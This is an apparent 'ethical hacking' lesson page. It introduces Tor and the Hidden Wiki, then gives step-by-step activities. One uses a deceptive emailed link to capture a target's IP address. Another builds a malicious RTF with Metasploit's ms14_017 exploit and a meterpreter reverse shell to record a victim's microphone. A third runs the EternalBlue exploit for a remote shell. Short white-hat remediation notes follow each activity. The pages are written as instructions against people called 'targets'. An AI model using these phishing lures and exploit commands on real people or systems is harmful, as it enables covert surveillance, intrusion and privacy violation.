Getting to the Dark Web


The Tor Browser

  1. Install the TOR Browser
  2. Find the Hidden Wiki
  3. Current Location: http://zqktlwi4fecvo6ri.onion/

What is TOR and is it illegal????

  1. TOR was initially developed by the US Navy;
  2. TOR is not illegal;
  3. TOR allows you to browse the web anonymously;
  4. TOR is usually slower than Chrome/Firefox/Safari;
  5. TOR encrypts your movement over many different services so it is nearly impossible to track your movement;
  6. TOR also hosts websites and services (where things like Silk Road and the, perhaps mythical, Red Rooms exist in the Dark Web);
  7. TOR services utilize bitcoin and other digital currencies;
  8. TOR is not 100% safe because "anonymity is not the same as security;"
  9. TOR's browser has been hacked by the FBI and NSA; the TOR networks are harder to hack.
  10. TOR users are "start here" targets even when nothing illegal is going on;
  11. If you want SECURITY, try using HTTPS or a VPN; if you want ANONYMITY, use TOR.

Why Can't I get to the Hidden Wiki from here?

  1. The Hidden Wiki is part of the DEEP WEB not indexed by Google;
  2. The Hidden Wiki can ONLY be found on an "Onion" browser;
  3. The address of the Hidden Wiki changes frequently.


Ethical Hacking


Creating the "Hot Box" Environment

  1. Install Virtual Box (or a VPN);
  2. Install Kali Linux (ISO file)

Why don't I use TOR in Kali?

  1. Because.
  2. Kali has a souped up version of Firefox. TOR is better, IMHO.
  3. You CAN download TOR into Kali.

Can I use TOR and VPN Together?

  1. Yes

Activities


Social Engineering 101: Getting an IP Address

  1. Create a fake email address at My Temp Email (handy for spam crap, too);
  2. Put that fake email address into WhatstheirIp;
  3. Check your fake email and copy the link they provide you and shorten it using Bitly;
  4. Write an email to your target that is PLAUSIBLE and LOOKS LEGIT. Get them to click on that Bitly! You can also embed that bitly into a photo.
  5. Check back at your fake email; if your target clicks the link you will get their IP address;
  6. Use IP Tracker to find their geo location;
  7. Use Google Maps to track the coordinates;
  8. Congrats! You have hacked their IP Address!
  9. But, your work is not over....our job and duty is to help people NOT get hacked!
  10. White Hats provide DETAILED information about what they found and how to fix issues;
  11. Review the "Don't Click S!@*" policy and train on phishing.

Advanced Hacking: How to Hack a Microphone (MS Office 10)

  1. Read this article from Hackers Arise
  2. Fire up Virtual Box, run Kali, and open Metasploit (in command line kali > msfconsole);
  3. Make sure Metasploit is updated (in command line kali > msfupdate);
  4. Create a DOC file to send to your target but save it as rtf;
  5. On the command line, type msf >use exploit/windows/fileformat/ms14_017_rtf;
  6. On the command line, set the file name to match what you wrote to your target msf > set FILENAME dinnertonight.rtf;
  7. On the command line, set the payload msf > set PAYLOAD windows/meterpreter/reverse_tcp;
  8. On the command line, set the LHOST to your IP address set LHOST 123.123.12.123;
  9. On the command line, type exploit;
  10. On the command line, type msf > use exploit/multi/handler;
  11. On the command line type msf > set PAYLOAD windows/meterpreter/reverse_tcp;
  12. On the command line, set the LHOST to your IP address set LHOST 123.123.12.123;
  13. Send file to target (you can always use that handy MyTempEmail!);
  14. On the command line, type meterpreter > run sound_recorder - l /root (you can create any directory, but remember that audio files are huge);
  15. Congrats! You can record someone.
  16. But, your work is not over....our job and duty is to help people NOT get hacked!
  17. White Hats provide DETAILED information about what they found and how to fix issues;
  18. To secure the web cam, have the target go into Windows 10 settings, select privacy, select camera;
  19. At the top of the page, push slider to "off" for apps to use camera and turn them on one at a time;
  20. Securing your microphone is not easy or free; but purchase a cheap set of buds with a microphone and plug them into the jack;
  21. Cut the earbuds and microphone off the earbuds, but leave the plug in the jack. Replace with functional buds when needed; replace with "fakes" when not in use.

How to Hack a System without Social Engineering (EternalBlue)

  1. Eternalblue was created by the NSA;
  2. Fire up Virtual Box, run Kali, and open Metasploit (in command line kali > msfconsole);
  3. Make sure Metasploit is updated (in command line kali > msfupdate);
  4. Search for eternalblue exploit (in command line kali > search eternalblue);
  5. Open ANOTHER terminal and type in the command line kali > cd /usr/share/metasploit-framework/modules/exploits/windows/smb
  6. In command line, type /usr/share/metasploit-framework/modules/exploits/windows/smb;
  7. Restart Kali and open Metasploit (in command line kali > msfconsole);
  8. Search for eternalblue exploit (in command line kali > search eternalblue);
  9. In command line, type msf > use exploit/windows/smb/ms17_010_eternalblue
  10. In command line, type msf > info
  11. In command line, type msf > show payloads
  12. In command line, type msf > set payload generic/shell_reverse_tcp
  13. In command line, type msf > show options
  14. In command line, type msf > set LHOST 123.123.1.123 (your IP)
  15. In command line, type msf > set RHOST 321.321.1.321 (target IP)
  16. Check your work (msf > show options);
  17. In command line, type exploit
  18. Type dir to check; if successful, you will see a line that says "ETERNALBLUE overwrite completed successfully"
  19. Congrats! You've hacked the system.
  20. But, your work is not over....our job and duty is to help people NOT get hacked!
  21. White Hats provide DETAILED information about what they found and how to fix issues;
  22. Have target install correct Windows 10 patches.

Ed Snowden's App for Home Security

  1. Download here for Android (no iPhone, yet)